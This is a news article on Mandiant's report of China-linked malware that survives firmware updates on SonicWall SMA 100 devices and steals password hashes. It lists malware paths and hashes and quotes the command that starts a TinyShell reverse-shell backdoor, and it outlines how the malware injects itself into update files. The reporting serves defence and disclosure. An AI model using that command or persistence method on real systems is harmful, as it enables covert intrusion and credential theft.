Threat actors linked to the Chinese government are infecting a widely used security device from SonicWall with malware that remains active even after the device receives firmware updates, researchers said.
SonicWall’s Secure Mobile Access 100 is a secure remote access device that helps organizations securely deploy a remote workforce. Customers use it to grant granular access controls to remote users, provide VPN connections to organizational networks, and define unique profiles for each employee. The access the SMA 100 has to customer networks makes it an attractive target for threat actors.
In 2021, the device was attacked by sophisticated hackers who exploited what was then a zero-day vulnerability. Security appliances from Fortinet and Pulse Secure have come under similar attacks in recent years.
Gaining long-term persistence in networks
On Thursday, security firm Mandiant released a report that said threat actors with suspected ties to China engaged in a campaign to maintain long-term persistence by running malware on unpatched SonicWall SMA appliances. The campaign was notable for the malware’s ability to remain on devices even after downloading new firmware.
“Attackers put significant effort into the stability and persistence of their tools,” wrote Mandiant researchers Daniel Lee, Stephen Eckels and Ben Read. “This allows their access to the network to continue through firmware updates and maintain a position on the network through the SonicWall appliance.”
To achieve this persistence, the malware checks for available firmware updates every 10 seconds. When an update is available, the malware copies the archived backup file, unzips it, mounts it, and then copies the entire malware package into it. The malware also adds a backdoor root user to the mounted file. The malware then recompresses the file so that it is ready for installation.
“The technique is not particularly sophisticated, but shows considerable effort on the attacker’s part to understand the device’s update cycle, then develop and test a method for persistence,” the researchers wrote.
The persistence techniques are consistent with a 2021 attack campaign that used 16 malware families to infect Pulse Secure devices. Mandiant attributed those attacks to multiple threat groups, including the ones tracked as UNC2630 and UNC2717, which the company said support “key priorities of the Chinese government.” Mandiant attributed the ongoing attacks against SonicWall SMA 100 customers to a group tracked as UNC4540.
“Over the past few years Chinese attackers have developed multiple exploits and zero-day malware for a variety of networked devices that face the Internet as an avenue for full enterprise intrusion, and the example reported here is part of a recent pattern that Mandiant expects to continue in the short term,” Mandiant researchers wrote in Thursday’s report.
Extremely privileged access
The main purpose of the malware appears to be to steal cryptographically hashed passwords for all logged-in users. It also provides a web shell that the threat actor can use to install new malware.
“Analysis of a compromised device revealed a collection of files that provide the attacker with highly privileged and available access to the device,” the researchers wrote in Thursday’s report. “The malware consists of a series of bash scripts and a single ELF binary identified as a TinyShell variant. The overall behavior of the bash suite shows a detailed understanding of the device and is well-tuned to the system to provide stability and persistence.”
The list of malware is:
Path | Hash | Function
--- | --- | ---
/bin/firewalld | e4117b17e3d14fe64f45750be71dbaa6 | Malware main process
/bin/httpsd | 2d57bcb8351cf2b57c4fd2d1bb8f862e | TinyShell backdoor
/etc/rc.d/rc.local | 559b9ae2a578e1258e80c45a5794c071 | Startup persistence for firewalld
/bin/iptabled | 8dbf1effa7bc94fc0b9b4ce83dfce2e6 | Redundant malware main process
/bin/geoBotnetd | 619769d3d40a3c28ec83832ca521f521 | Firmware backdoor script
/bin/ifconfig6 | fa1bf2e427b2defffd573854c35d4919 | Graceful shutdown script
The report continued:
The primary malware entry point is a bash script named firewalld, which executes its main loop once for every file on the system: …for j in $(ls / -R) do for i in $(ls / -R) do: … The script is responsible for executing a SQL statement to complete the credential theft and for executing the other components. The first function in firewalld runs the TinyShell backdoor httpsd with the command
nohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 &
if the httpsd process is not already running. This puts TinyShell into reverse shell mode, instructing it to call out to the aforementioned IP address and port at a specific time and day represented by the -m flag, with a beacon interval defined by the -d flag. The binary embeds a hardcoded IP address, which is used in reverse shell mode if the IP address argument is left blank. It also has a bind shell mode available.
The researchers said they did not know who the original source of infection was.
Last week, SonicWall published an advisory urging SMA 100 users to upgrade to version 10.2.1.7 or later. These versions include improvements such as file integrity monitoring and abnormal process detection. Users should also regularly review logs for signs of compromise, including abnormal connections or internal traffic.